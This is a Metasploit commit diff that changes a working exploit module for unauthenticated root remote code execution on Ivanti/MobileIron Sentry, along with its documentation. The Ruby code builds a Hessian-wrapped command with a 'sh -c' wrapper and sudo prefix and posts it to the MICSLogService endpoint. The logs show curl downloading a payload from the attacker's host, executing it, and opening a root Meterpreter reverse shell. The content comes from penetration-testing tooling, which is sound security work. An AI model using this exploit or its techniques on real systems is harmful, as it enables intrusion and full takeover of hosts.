Thanks to Spencer improved execute_command method

rapid7 · Sep 12, 2023 · b83a49e · b83a49e
1 parent 15908b9
commit b83a49e
Show file tree

Hide file tree

Showing 2 changed files with 39 additions and 107 deletions.
diff --git a/documentation/modules/exploit/linux/http/ivanti_sentry_misc_log_service.md b/documentation/modules/exploit/linux/http/ivanti_sentry_misc_log_service.md
@@ -53,92 +53,28 @@ has a configurable option in case it needs to be disabled.
 ```
 msf6 > use linux/http/ivanti_sentry_misc_log_service
 [*] Using configured payload cmd/linux/http/x64/meterpreter_reverse_tcp
-msf6 exploit(linux/http/ivanti_sentry_misc_log_service) > set rhosts 192.168.1.78
-rhosts => 192.168.1.78
+msf6 exploit(linux/http/ivanti_sentry_misc_log_service) > set rhosts 192.168.1.87
+rhosts => 192.168.1.87
 msf6 exploit(linux/http/ivanti_sentry_misc_log_service) > set lhost 192.168.1.72
 lhost => 192.168.1.72
 msf6 exploit(linux/http/ivanti_sentry_misc_log_service) > set fetch_srvhost 192.168.1.72
 fetch_srvhost => 192.168.1.72
 msf6 exploit(linux/http/ivanti_sentry_misc_log_service) > set verbose true
 verbose => true
-msf6 exploit(linux/http/ivanti_sentry_misc_log_service) > options
-
-Module options (exploit/linux/http/ivanti_sentry_misc_log_service):
-
-   Name           Current Setting  Required  Description
-   ----           ---------------  --------  -----------
-   SLEEP  3                yes       How long to wait for each command to run. Because the execu
-                                             tion context does not allow for command piping or chaining
-                                             we need to split the multi command payload by semi-colon an
-                                             d send each command individually
-   Proxies                         no        A proxy chain of format type:host:port[,type:host:port][...
-                                             ]
-   RHOSTS         192.168.1.78     yes       The target host(s), see https://docs.metasploit.com/docs/us
-                                             ing-metasploit/basics/using-metasploit.html
-   RPORT          8443             yes       The target port (TCP)
-   SSL            true             no        Negotiate SSL/TLS for outgoing connections
-   SSLCert                         no        Path to a custom SSL certificate (default is randomly gener
-                                             ated)
-   URIPATH                         no        The URI to use for this exploit (default is random)
-   USE_SUDO       true             yes       Execute payload as root using sudo
-   VHOST                           no        HTTP server virtual host
-
-
-   When CMDSTAGER::FLAVOR is one of auto,tftp,wget,curl,fetch,lwprequest,psh_invokewebrequest,ftp_http:
-
-   Name     Current Setting  Required  Description
-   ----     ---------------  --------  -----------
-   SRVHOST  0.0.0.0          yes       The local host or network interface to listen on. This must be an
-                                        address on the local machine or 0.0.0.0 to listen on all address
-                                       es.
-   SRVPORT  8080             yes       The local port to listen on.
-
-
-Payload options (cmd/linux/http/x64/meterpreter_reverse_tcp):
-
-   Name                Current Setting  Required  Description
-   ----                ---------------  --------  -----------
-   FETCH_COMMAND       CURL             yes       Command to fetch payload (Accepted: CURL, FTP, TFTP, T
-                                                  NFTP, WGET)
-   FETCH_DELETE        false            yes       Attempt to delete the binary after execution
-   FETCH_FILENAME      QldLjjMRU        no        Name to use on remote system when storing payload; can
-                                                  not contain spaces.
-   FETCH_SRVHOST       192.168.1.72     no        Local IP to use for serving payload
-   FETCH_SRVPORT       8080             yes       Local port to use for serving payload
-   FETCH_URIPATH                        no        Local URI to use for serving payload
-   FETCH_WRITABLE_DIR  /tmp             yes       Remote writable dir to store payload; cannot contain s
-                                                  paces.
-   LHOST               192.168.1.72     yes       The listen address (an interface may be specified)
-   LPORT               4443             yes       The listen port
-
-
-Exploit target:
-
-   Id  Name
-   --  ----
-   0   Unix (In-Memory)
-
-
-
-View the full module info with the info, or info -d command.
-
-msf6 exploit(linux/http/ivanti_sentry_misc_log_service) > exploit
-[*] Reloading module...
+msf6 exploit(linux/http/ivanti_sentry_misc_log_service) > run
 
-[*] Command to run on remote host: curl -so /tmp/ccrjHXsc http://192.168.1.72:8080/etRbFA76UzDRclkL8zrTdg; chmod +x /tmp/ccrjHXsc; /tmp/ccrjHXsc &
+[*] Command to run on remote host: curl -so /tmp/VuQctuYoROm http://192.168.1.72:8080/_acSmp3HzcREnJ2MMRBPoQ; chmod +x /tmp/VuQctuYoROm; /tmp/VuQctuYoROm &
 [*] Fetch Handler listening on 192.168.1.72:8080
 [*] HTTP server started
-[*] Adding resource /etRbFA76UzDRclkL8zrTdg
-[*] Started reverse TCP handler on 192.168.1.72:4443
+[*] Adding resource /_acSmp3HzcREnJ2MMRBPoQ
+[*] Started reverse TCP handler on 192.168.1.72:4444
 [*] Running automatic check ("set AutoCheck false" to disable)
 [+] The target appears to be vulnerable.
 [*] Executing Unix (In-Memory) for cmd/linux/http/x64/meterpreter_reverse_tcp
-[*] Running the command: sudo curl -so /tmp/ccrjHXsc http://192.168.1.72:8080/etRbFA76UzDRclkL8zrTdg
-[*] Client 192.168.1.78 requested /etRbFA76UzDRclkL8zrTdg
-[*] Sending payload to 192.168.1.78 (curl/7.29.0)
-[*] Running the command: sudo  chmod +x /tmp/ccrjHXsc
-[*] Running the command: sudo  /tmp/ccrjHXsc &
-[*] Meterpreter session 6 opened (192.168.1.72:4443 -> 192.168.1.78:40550) at 2023-08-29 14:27:57 -0400
+[*] Running the command: sudo sh -c $@|sh . echo curl -so /tmp/VuQctuYoROm http://192.168.1.72:8080/_acSmp3HzcREnJ2MMRBPoQ; chmod +x /tmp/VuQctuYoROm; /tmp/VuQctuYoROm &
+[*] Client 192.168.1.87 requested /_acSmp3HzcREnJ2MMRBPoQ
+[*] Sending payload to 192.168.1.87 (curl/7.29.0)
+[*] Meterpreter session 4 opened (192.168.1.72:4444 -> 192.168.1.87:46828) at 2023-09-12 14:51:44 -0400
 
 meterpreter > getuid
 Server username: root
@@ -154,32 +90,29 @@ meterpreter > exit
 ### MobileIron Sentry 9.12.0-19 (Linux Dropper)
 
 ```
-msf6 exploit(linux/http/ivanti_sentry_misc_log_service) > set rhosts 192.168.1.78
-rhosts => 192.168.1.78
+msf6 exploit(linux/http/ivanti_sentry_misc_log_service) > set rhosts 192.168.1.87
+rhosts => 192.168.1.87
 msf6 exploit(linux/http/ivanti_sentry_misc_log_service) > set lhost 192.168.1.72
 lhost => 192.168.1.72
+msf6 exploit(linux/http/ivanti_sentry_misc_log_service) > set fetch_srvhost 192.168.1.72
+fetch_srvhost => 192.168.1.72
 msf6 exploit(linux/http/ivanti_sentry_misc_log_service) > set verbose true
 verbose => true
-msf6 exploit(linux/http/ivanti_sentry_misc_log_service) > set target 1
-target => 1
 msf6 exploit(linux/http/ivanti_sentry_misc_log_service) > run
 
-[*] Started reverse TCP handler on 192.168.1.72:4443
+[*] Started reverse TCP handler on 192.168.1.72:4444
 [*] Running automatic check ("set AutoCheck false" to disable)
 [+] The target appears to be vulnerable.
 [*] Executing Linux Dropper for linux/x64/meterpreter/reverse_tcp
-[*] Using URL: http://192.168.1.72:8080/vgrmjQ1
-[*] Generated command stager: ["curl -so /tmp/NCAcpzqb http://192.168.1.72:8080/vgrmjQ1;chmod +x /tmp/NCAcpzqb;/tmp/NCAcpzqb;rm -f /tmp/NCAcpzqb"]
-[*] Running the command: sudo curl -so /tmp/NCAcpzqb http://192.168.1.72:8080/vgrmjQ1
-[*] Client 192.168.1.78 (curl/7.29.0) requested /vgrmjQ1
-[*] Sending payload to 192.168.1.78 (curl/7.29.0)
-[*] Running the command: sudo chmod +x /tmp/NCAcpzqb
-[*] Running the command: sudo /tmp/NCAcpzqb
+[*] Using URL: http://192.168.1.72:8080/p1EzQTA94FH
+[*] Generated command stager: ["curl -so /tmp/zzEjCUHC http://192.168.1.72:8080/p1EzQTA94FH;chmod +x /tmp/zzEjCUHC;/tmp/zzEjCUHC;rm -f /tmp/zzEjCUHC"]
+[*] Running the command: sudo sh -c $@|sh . echo curl -so /tmp/zzEjCUHC http://192.168.1.72:8080/p1EzQTA94FH;chmod +x /tmp/zzEjCUHC;/tmp/zzEjCUHC;rm -f /tmp/zzEjCUHC
+[*] Client 192.168.1.87 (curl/7.29.0) requested /p1EzQTA94FH
+[*] Sending payload to 192.168.1.87 (curl/7.29.0)
 [*] Transmitting intermediate stager...(126 bytes)
-[*] Sending stage (3045380 bytes) to 192.168.1.78
-[*] Meterpreter session 7 opened (192.168.1.72:4443 -> 192.168.1.78:40572) at 2023-08-29 14:28:22 -0400
-[*] Running the command: sudo rm -f /tmp/NCAcpzqb
-[*] Command Stager progress - 100.00% done (112/112 bytes)
+[*] Sending stage (3045380 bytes) to 192.168.1.87
+[*] Command Stager progress - 100.00% done (116/116 bytes)
+[*] Meterpreter session 5 opened (192.168.1.72:4444 -> 192.168.1.87:46874) at 2023-09-12 15:04:40 -0400
 [*] Server stopped.
 
 meterpreter > getuid
@@ -190,6 +123,7 @@ OS           : CentOS 7.8.2003 (Linux 3.10.0-1160.el7.x86_64)
 Architecture : x64
 BuildTuple   : x86_64-linux-musl
 Meterpreter  : x64/linux
+meterpreter >
 ```
 
 
diff --git a/modules/exploits/linux/http/ivanti_sentry_misc_log_service.rb b/modules/exploits/linux/http/ivanti_sentry_misc_log_service.rb
@@ -98,30 +98,28 @@ def check
   def execute_command(cmd, _opts = {})
     # Below is the Hessian binary web service protocol wrapper required to invoke the function `uploadFileUsingFileInput`
     # which allows for unauthenticated command execution in the context of the root user.
-    # More information on Hessian can be found: http://hessian.caucho.com/doc/hessian-1.0-spec.xtp#Headers
+    # More info on Hessian: http://hessian.caucho.com/doc/hessian-1.0-spec.xtp#Headers
 
     exploit_header = "c\x01\x00m\x00\x18uploadFileUsingFileInputMS\x00\x07commandS\x00"
     exploit_footer = "S\x00\x06isRootTzNz"
 
-    cmds = cmd.split(';')
-    cmds.each do |c|
-      c = "sudo #{c}" if datastore['USE_SUDO']
-      vprint_status('Running the command: ' + c)
+    # The sink in this RCE is java's Runtime.getRuntime.exec(). So we must prefix our command with 'sh -c $@|sh .echo'
+    # in order to obtain full shell functionality, more info: https://codewhitesec.blogspot.com/2015/03/sh-or-getting-shell-environment-from.html
+    cmd = "sh -c $@|sh . echo #{cmd}"
+    cmd = "sudo #{cmd}" if datastore['USE_SUDO']
 
-      # Prepend the command with the length of the command as per Hessian notation
-      data = exploit_header + [c.length].pack('C') + c + exploit_footer
-      res = send_request_raw(
-        'uri' => normalize_uri(target_uri.path, '/mics/services/MICSLogService'),
-        'method' => 'POST',
-        'data' => data
-      )
+    vprint_status('Running the command: ' + cmd)
 
-      fail_with(Failure::Unreachable, 'The target did not respond to the exploit attempt') unless res
-      fail_with(Failure::UnexpectedReply, "The response from a successful exploit attempt should be a HTTP 200 with 'isRunning' in the response body.") unless res.code == 200 && res.body.include?('isRunning')
+    # Prepend the command with the length of the command as per Hessian notation
+    data = exploit_header + [cmd.length].pack('C') + cmd + exploit_footer
+    res = send_request_raw(
+      'uri' => normalize_uri(target_uri.path, '/mics/services/MICSLogService'),
+      'method' => 'POST',
+      'data' => data
+    )
 
-      # Because we split the payload up by semi-colons, we don't want all the commands run immediately after one another. Ensure the reverse shell has time to finish downloading before the module attempts to run it.
-      sleep(datastore['SLEEP'])
-    end
+    fail_with(Failure::Unreachable, 'The target did not respond to the exploit attempt') unless res
+    fail_with(Failure::UnexpectedReply, "The response from a successful exploit attempt should be a HTTP 200 with 'isRunning' in the response body.") unless res.code == 200 && res.body.include?('isRunning')
   end
 
   def exploit